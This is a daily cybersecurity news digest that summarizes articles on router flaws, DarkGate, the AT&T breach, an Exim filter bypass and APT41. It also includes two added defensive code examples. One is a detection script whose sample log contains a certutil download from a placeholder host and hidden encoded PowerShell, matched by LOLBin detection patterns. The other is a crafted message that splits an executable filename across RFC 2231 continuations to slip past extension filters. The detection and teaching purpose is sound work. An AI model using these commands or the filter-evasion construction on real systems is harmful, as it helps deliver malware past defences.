Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11827
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | |
|---|---|---|---|---|---|
| 2024-07-12 15:55:33 | bleepingcomputer | CYBERCRIME | Netgear Urges Firmware Update to Address Router Security Flaws | Netgear has issued a firmware update for multiple WiFi 6 routers to rectify critical vulnerabilities including a stored XSS and an authentication bypass.
The XSS flaw, identified in the XR1000 Nighthawk model, could potentially allow attackers to hijack user sessions or direct users to malicious sites by exploiting the router’s interface.
The authentication bypass issue in the CAX30 Nighthawk AX6 model poses severe threats, enabling unauthorized administrative access and possibly full device control.
Firmware updates correcting these issues are now available and strongly recommended by Netgear for immediate installation.
The advisory highlights serious potential compromises, including session hijacking, privileged actions without consent, and full system takeover.
Users are urged to promptly download the updated firmware versions—1.0.0.72 for XSS vulnerability and 2.2.2.2 for the authentication bypass—to mitigate risks.
Netgear was also in the news recently for a separate set of vulnerabilities in the WNR614 N300 model, which is end-of-life and will not receive fixes, underlining its ongoing security challenges.
The advisory also states that Netgear accepts no liability for consequences of failing to apply the recommended updates. | Details |
| 2024-07-12 15:40:01 | bleepingcomputer | CYBERCRIME | Netgear Urges Firmware Updates to Fix Critical Router Flaws | Netgear advises users to update their routers' firmware to patch critical vulnerabilities affecting multiple WiFi 6 router models.
The stored XSS flaw (PSV-2023-0122), fixed in firmware version 1.0.0.72, affects the XR1000 Nighthawk gaming router and could allow attackers to hijack user sessions and steal data.
An authentication bypass issue (PSV-2023-0138), resolved in firmware version 2.2.2.2, impacts the CAX30 Nighthawk AX6 6-Stream cable modem routers, potentially permitting unauthorized administrative access.
Both vulnerabilities pose significant security risks, especially the authentication bypass which could lead to a complete takeover of the device.
A spokesperson from Netgear was unavailable for comment when additional details of the flaws were sought by the press.
Users affected by the flaws are strongly urged by Netgear to download and install the latest firmware updates as a preventive measure against potential attacks.
Netgear also cautioned users of the WNR614 N300 router about multiple vulnerabilities, recommending replacement due to the lack of support for this end-of-life model. | Details |
| 2024-07-12 14:53:48 | thehackernews | MALWARE | DarkGate Malware Targets Samba Shares in Global Campaign | Palo Alto Networks' Unit 42 identified a DarkGate campaign that, during March and April 2024, hosted its payloads on public-facing Samba file shares to infect targets across North America, Europe, and Asia.
Initial access came via malicious Microsoft Excel (.xlsx) files that lure the user into clicking a button, which fetches and runs a VBScript from the attacker-controlled Samba share.
DarkGate, first documented in 2018 and now sold as malware-as-a-service (MaaS), provides remote control, code execution, cryptocurrency mining, and delivery of further payloads.
DarkGate activity surged after law enforcement dismantled the QakBot infrastructure in August 2023.
Attack sequences also involve JavaScript, using similarly deceptive methods to download and initiate malware via PowerShell scripts.
DarkGate evades detection by scanning for anti-malware software and assessing the CPU to determine if it operates on a physical or virtual machine.
DarkGate obfuscates its command-and-control (C2) traffic inside otherwise unencrypted HTTP requests, which makes it harder to spot on the wire without decoding.
Researchers underscore the enduring threat of DarkGate due to its evolving tactics and highlight the imperative for robust cybersecurity measures. | Details |
| 2024-07-12 14:48:25 | bleepingcomputer | MISCELLANEOUS | Enhancing Cyber Defense Against Stealthy LOTL Attacks with Wazuh | Living Off The Land (LOTL) attacks abuse tools already present on the system to stay undetected; because they are often fileless and introduce no attacker-specific binaries, there is no unique signature to match.
LOTL attackers utilize built-in binaries, scripts, and system utilities, camouflaging malicious activities within normal operations.
Wazuh, a security platform, offers capabilities such as Extended Detection and Response (XDR) and Security Information and Event Management (SIEM) to monitor and counter such threats.
Effective detection strategies include continuous monitoring for unusual system tool usage, real-time analysis of log data, and anomaly detection in system configurations and resource consumption.
Wazuh's features include log data analysis, file integrity monitoring, threat detection, real-time alerting, and automated incident response to enhance protections against LOTL tactics.
Regular vulnerability scans are critical, allowing organizations to patch detected weaknesses and reduce the attack surface for potential exploitation by LOTL methods.
The platform's customizable nature allows for the integration of third-party solutions to adapt to specific organizational needs and enhance overall cyber resilience. | Details |
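An added example (not Wazuh's rules and not code from the article) of the "monitor for unusual system-tool usage" strategy described above: a handful of constructed process-creation events, including an Excel-to-script-host-to-PowerShell chain like the one in the DarkGate item in this brief, are run through rules that flag suspicious parent/child pairs and LOLBin command-line switches while letting ordinary administrative use of PowerShell pass. The hostnames, the 203.0.113.5 address and the rule names are invented for the example.

```python
import json
import re

# Constructed process-creation events in JSON-lines form (not real telemetry).
# The fields mirror what a Sysmon event ID 1 or an EDR process feed provides.
SAMPLE_LOG = r"""
{"host":"ws01","parent":"explorer.exe","image":"excel.exe","cmdline":"excel.exe C:\\Users\\alice\\Downloads\\invoice.xlsx"}
{"host":"ws01","parent":"excel.exe","image":"wscript.exe","cmdline":"wscript.exe \\\\203.0.113.5\\share\\update.vbs"}
{"host":"ws01","parent":"wscript.exe","image":"powershell.exe","cmdline":"powershell.exe -nop -w hidden -enc SQBFAFgA"}
{"host":"ws02","parent":"cmd.exe","image":"certutil.exe","cmdline":"certutil.exe -urlcache -split -f http://203.0.113.5/a.dat a.dat"}
{"host":"ws03","parent":"explorer.exe","image":"powershell.exe","cmdline":"powershell.exe Get-ChildItem C:\\logs"}
{"host":"ws03","parent":"services.exe","image":"svchost.exe","cmdline":"svchost.exe -k netsvcs"}
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}

# (rule name, image the rule applies to or None for any image, pattern on the command line)
LOLBIN_RULES = [
    ("certutil_download_or_decode", "certutil.exe",
     re.compile(r"-urlcache|-decode", re.I)),
    ("powershell_encoded_command", "powershell.exe",
     re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\b", re.I)),
    ("powershell_hidden_window", "powershell.exe",
     re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    # A script or binary pulled from a UNC path (\\host\share\...) on a workstation.
    ("script_loaded_from_unc_path", None,
     re.compile(r"\\\\[\w.\-]+\\")),
]


def evaluate(event):
    """Return the names of the rules that fire for one process-creation event."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmdline = event["cmdline"]
    hits = []
    # Parent/child relationship: an Office app should not be launching script hosts.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_app_spawned_script_host")
    # Command-line switches that are legitimate but rarely used by ordinary admins.
    for name, target, pattern in LOLBIN_RULES:
        if (target is None or target == image) and pattern.search(cmdline):
            hits.append(name)
    return hits


def run(log_text):
    """Evaluate every JSON line and return (host, image, rule) triples that fired."""
    findings = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        for rule in evaluate(event):
            findings.append((event["host"], event["image"], rule))
    return findings


if __name__ == "__main__":
    for finding in run(SAMPLE_LOG):
        print(*finding)
```

The benign `Get-ChildItem` event and the `svchost.exe` service host produce no findings; the Excel-spawned script host fires twice (parent/child pair and UNC path), which is the kind of correlated signal a SIEM rule would escalate rather than a single-tool match.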
| 2024-07-12 14:27:54 | theregister | MISCELLANEOUS | Enhancing Identity Security with New Technological Approaches | Threat actors increasingly exploit weak points in identity security, targeting user identities and multi-factor authentication (MFA) systems.
New security solutions, such as Shared Signals and Identity Threat Detection and Response (ITDR) systems enhanced with machine learning, are being developed to counter these vulnerabilities.
Upcoming frameworks and technologies, including digital verifiable credentials, are poised to reshape the identity security landscape.
Cisco's upcoming webinar, featuring security strategists Sami Laine and Josh Green, will discuss the evolution of identity security and the integral components of Cisco Duo's solution, including Identity Intelligence and Risk-Based Access Policies.
The webinar aims to educate on making MFA unobtrusive, thus improving the user experience without compromising security effectiveness.
Attendees of the webinar, scheduled for 17 July 2024, can expect to gain insights into enhancing their organization’s security posture against identity threats. | Details |
| 2024-07-12 14:12:18 | theregister | DATA BREACH | AT&T Reports Major Data Breach Affecting 110 Million Customers | AT&T disclosed a significant data breach resulting from a cyberattack on a third-party cloud platform, impacting approximately 110 million customers.
The breach affected almost all AT&T wireless customers, including those on mobile virtual network operators using AT&T’s network, exposing call and text metadata.
The records do not contain names, Social Security numbers or call content, but they do include phone numbers and, for a subset, cell site identification numbers that could be used to approximate where calls were made.
The Federal Bureau of Investigation (FBI) has made at least one arrest in connection with the data theft and has been involved with the case since its discovery in mid-April.
AT&T believes that stolen customer data has not been published online yet but remains cautious about the potential risks and exposure.
The incident followed another major data leak disclosed in March, where data from 73 million customers was published online, signaling an alarming trend of data security challenges for the company.
This breach is part of a broader campaign against Snowflake customer instances, in which attackers logged in with stolen credentials to accounts that had not enforced multifactor authentication and took data from roughly 165 organizations.
Snowflake has since given administrators the ability to require multifactor authentication for all users. | Details |
| 2024-07-12 13:41:28 | bleepingcomputer | DATA BREACH | AT&T Data Breach Exposes Call Logs of 109 Million Customers | AT&T confirmed a significant data breach from their Snowflake account affecting nearly all mobile customers, involving the theft of call and text records.
Approximately 109 million customers' call logs from specified dates in 2022 and 2023 were exposed; however, personal identifiers like names or Social Security numbers were not included.
The breach occurred between April 14 and April 25, 2024, with stolen data containing metadata that could potentially be used to identify individuals when correlated with other public data.
The Department of Justice permitted AT&T to delay public notification twice to facilitate a law enforcement investigation into the sensitive nature of stolen records.
AT&T has increased cybersecurity safeguards, collaborated with law enforcement, and apprehended at least one suspect in connection with the breach.
Current and former customers will be notified by AT&T and can check if their information was compromised via an AT&T-provided FAQ page.
There is no current evidence that the breached data has been publicly disclosed, and this breach is said to be unrelated to a previous incident in 2021.
The breach is part of a broader series of attacks on Snowflake customers, which led the company to add stronger controls such as letting administrators require multi-factor authentication for all users. | Details |
| 2024-07-12 12:29:34 | thehackernews | NATION STATE ACTIVITY | Australian Army Private Charged with Espionage for Russia | A married couple, Australian Defence Force (ADF) Private Kira Korolev and her husband Igor, were arrested in Brisbane on charges of espionage for Russia.
The operation, codenamed BURGAZADA, was triggered after Kira traveled to Russia and instructed Igor to access her ADF work account to send sensitive information to her private email.
The couple face charges of preparing for an espionage offense, with penalties up to 15 years in prison. This marks the first use of Australia’s espionage laws updated in 2018.
The Australian Federal Police (AFP) state that the accessed documents pertained to national security, though specifics on the documents remain undisclosed.
Investigations continue into whether the information was actually conveyed to Russian authorities.
Australian officials highlight the intensifying global espionage threats, emphasizing the ongoing risks to national security and sovereignty.
This case is one of several recent charges in Australia related to espionage or foreign interference, illustrating a broader pattern of rising international espionage activities. | Details |
| 2024-07-12 10:57:45 | thehackernews | MALWARE | Critical Security Flaw in Exim Mail Servers Risks Malware Delivery | A significant vulnerability identified in Exim mail servers potentially exposes millions to malicious email attachments.
Designated as CVE-2024-39929, this flaw has a critical severity rating of 9.1 and affects versions up to 4.97.1.
The susceptibility stems from improper parsing of RFC 2231 multiline headers, allowing attackers to circumvent MIME filename extension filters.
Censys counts about 4.83 million of roughly 6.54 million internet-facing SMTP servers as running Exim, of which about 1.57 million run a potentially vulnerable version.
The most impacted regions include the U.S., Russia, and Canada, with many servers still unpatched as of the latest reports.
Successful exploitation requires a user to download and execute the malicious attachment, posing significant risks of system compromise.
No active exploits have been reported yet; however, immediate update to version 4.98 is advised to mitigate this risk.
The discovery follows a previous set of vulnerabilities found nearly a year ago, emphasizing continual security challenges for Exim. | Details |
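A worked example, added here and not taken from Exim or the advisory, of the bypass class behind the Exim item above: a filter that checks the attachment extension against a single-line `filename="..."` parameter, while the message carries the name as RFC 2231 parameter continuations (`filename*0`, `filename*1`) folded across several header lines. The message is constructed; Python's `email` package reassembles the continuations, so comparing a naive regex with `get_filename()` shows exactly what the weak filter misses. Exim's actual parser defect differs in its details; the block only demonstrates the header construction and the correct way to decode it.

```python
import email
import re

# Extensions an inbound mail filter would refuse (policy assumed for the example).
BLOCKED_EXTENSIONS = {".exe", ".scr", ".vbs", ".js", ".bat", ".com", ".hta"}

# Constructed sample message (not a real capture). The attachment filename is
# carried as RFC 2231 parameter continuations, folded across three header lines,
# so no single line contains filename="invoice.exe".
SAMPLE_MESSAGE = """\
From: sender@example.test
To: victim@example.test
Subject: invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

see attached
--b1
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename*0="invoice.";
 filename*1="exe"

TVqQAAMAAAAEAAAA//8AAA==
--b1--
"""


def naive_filename(raw_disposition):
    """Weak filter: only understands filename="..." written as one plain parameter."""
    m = re.search(r'filename="([^"]*)"', raw_disposition, re.IGNORECASE)
    return m.group(1) if m else None


def is_blocked(name):
    """Extension check shared by both filters; no filename means nothing to block."""
    if not name:
        return False
    return any(name.lower().endswith(ext) for ext in BLOCKED_EXTENSIONS)


def scan(raw_message):
    """Return (naive, correct): per attachment, (filename seen, blocked?)."""
    msg = email.message_from_string(raw_message)
    naive, correct = [], []
    for part in msg.walk():
        disposition = part.get("Content-Disposition")
        if part.is_multipart() or not disposition:
            continue
        # The raw header value still contains the folded continuation lines.
        seen = naive_filename(disposition)
        naive.append((seen, is_blocked(seen)))
        # get_filename() joins the filename*N pieces and applies RFC 2231 decoding.
        real = part.get_filename()
        correct.append((real, is_blocked(real)))
    return naive, correct


if __name__ == "__main__":
    print(scan(SAMPLE_MESSAGE))
```

The naive filter sees no filename at all and lets the part through; the RFC 2231-aware decoder recovers `invoice.exe` and blocks it. The practical lesson is that an extension filter must run on the fully decoded parameter value, never on the raw header text.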
| 2024-07-12 10:32:10 | thehackernews | CYBERCRIME | Understanding How Stolen Passwords Compromise Security in 2024 | Recent data shows compromised credentials as the leading attack vector in 2024.
Stolen passwords pose more of a threat than zero-day exploits or advanced malware.
Many are unaware their credentials are stolen until significant damage occurs.
Consequences include drained bank accounts, stolen identity, and damaged corporate reputations.
The upcoming webinar hosted by Tim Chase focuses on prevention and awareness regarding password theft.
Participants will gain insights into protecting sensitive information from credential compromise. | Details |
| 2024-07-12 08:34:44 | thehackernews | NATION STATE ACTIVITY | U.S. Cracks Down on Russian AI-Driven Disinformation Network | The U.S. Department of Justice seized internet domains and scrutinized numerous social media accounts used by Russian entities to disseminate disinformation.
AI technology was employed by a bot farm to construct fake profiles purporting to be Americans to push narratives favorable to the Kremlin.
An employee from Russian state media RT and an FSB officer orchestrated the bot network to influence public opinion in multiple countries including the U.S. and several European nations.
The operation utilized an AI software named Meliorator for mass creation and management of these profiles on social media platform X, which has now suspended these accounts.
Investigations remain active, with no criminal charges disclosed yet, highlighting the ongoing concerns over foreign influence in domestic affairs.
Google, Meta, and OpenAI have flagged continuous misuse of their platforms by similar Russian operations, notably a disinformation network named Doppelganger.
International collaborations, including agencies from the U.S., Canada, and the Netherlands, have been pivotal in addressing this cybersecurity threat. | Details |
| 2024-07-12 03:33:48 | theregister | CYBERCRIME | Singapore Banks to Replace SMS OTPs with Digital Tokens | The Monetary Authority of Singapore and the Association of Banks Singapore announced the phasing out of SMS-based OTPs for bank logins within three months, aiming to bolster security against phishing.
This decision reflects growing concerns about scammers exploiting the vulnerabilities of SMS OTPs, driving a shift towards more secure digital tokens for authentication.
Digital tokens, which generate OTPs on smartphones, are recommended as a safer alternative for securing bank account access.
Legal expert Bryan Tan views the move as a logical step given the increasing frequency of OTP-related scams.
Concerns have been raised about the inclusivity of this change, particularly affecting the elderly and those without smartphones, with no clear measures announced yet to address these issues.
Despite potential inconvenience, this strategic shift is part of broader efforts to enhance digital security and minimize scam risks in Singapore's banking sector.
Smartphone penetration in Singapore is high at 97% in 2023, yet challenges remain in ensuring all demographics maintain secure and up-to-date technology usage. | Details |
| 2024-07-12 01:31:29 | theregister | NATION STATE ACTIVITY | APT41 Employs Newly Enhanced Malware for Cyber Espionage | Chinese cyber espionage group APT41, linked to the Chinese Ministry of State Security, reportedly adds new tools, DodgeBox and MoonWalk, to its malicious software arsenal.
Zscaler’s ThreatLabz identifies and analyzes the new malware, noting notable similarities and enhancements compared to APT41's previous tool, StealthVector.
DodgeBox, a shellcode loader, adds detection-evasion features including environment checks and AES-encrypted payloads.
It uses a custom API-hashing scheme and system checks to defeat static detection and includes a method for sidestepping Windows Control Flow Guard.
MoonWalk backdoor, deployed via DodgeBox, features evasion methods similar to the loader and uses Google Drive for command-and-control operations.
Incidents of DodgeBox have been identified primarily in Southeast Asia, aligning with APT41's geographical focus in previous campaigns.
The U.S. government has previously charged members of APT41 with global cyber attacks, suggesting both espionage and financially motivated activities. | Details |
| 2024-07-12 00:24:57 | theregister | CYBERCRIME | Hacktivist Group Disbands After Targeting Conservative Think Tank | Hacktivist group SiegedSec, identifying as "gay furry hackers," has disbanded after hacking The Heritage Foundation and leaking 2GB of its files.
The group claims the disbandment was planned prior to the raid for reasons including stress and desire to avoid FBI attention.
The leaked files were in retaliation against The Heritage Foundation's involvement with Project 2025, a blueprint for conservative presidential policies.
Project 2025, linked to Donald Trump and the Republican National Committee, aims to reshape US government policies including significant cuts to healthcare and environmental regulations.
The Heritage Foundation did not officially respond to inquiries about the security breach or leaked communications with SiegedSec.
SiegedSec has a history of targeting organizations it perceives as threatening LGBTQ+ and abortion rights, including America's largest nuclear power lab and NATO.
In a leaked exchange, Heritage's Mike Howell threatened the hacktivists with exposure and legal consequences, in language at odds with the organization's professed Christian values. | Details |
| 2024-07-11 21:35:32 | bleepingcomputer | RANSOMWARE | ARRL Confirms Employee Data Stolen in Ransomware Attack | The American Radio Relay League (ARRL) confirmed a data breach by a ransomware attack on May 14, affecting employee personal information.
The breach was initially described as a "serious incident" and later identified as a "sophisticated ransomware incident."
External forensic experts were hired to analyze the breach, and systems were taken offline to contain the spread.
ARRL identified the attackers as a "malicious international cyber group" and has engaged federal law enforcement for further investigation.
Personal data stolen includes names, addresses, and social security numbers of 150 employees.
ARRL has provided 24 months of free identity monitoring to impacted individuals out of caution, even though there is no evidence of misuse of the stolen data.
It is speculated that the Embargo ransomware group, newly active since May, is responsible for the attack; however, ARRL has not confirmed this link.
ARRL hinted that reasonable steps were taken to prevent further distribution of the data, implying a possible ransom payment to avoid data leakage. | Details |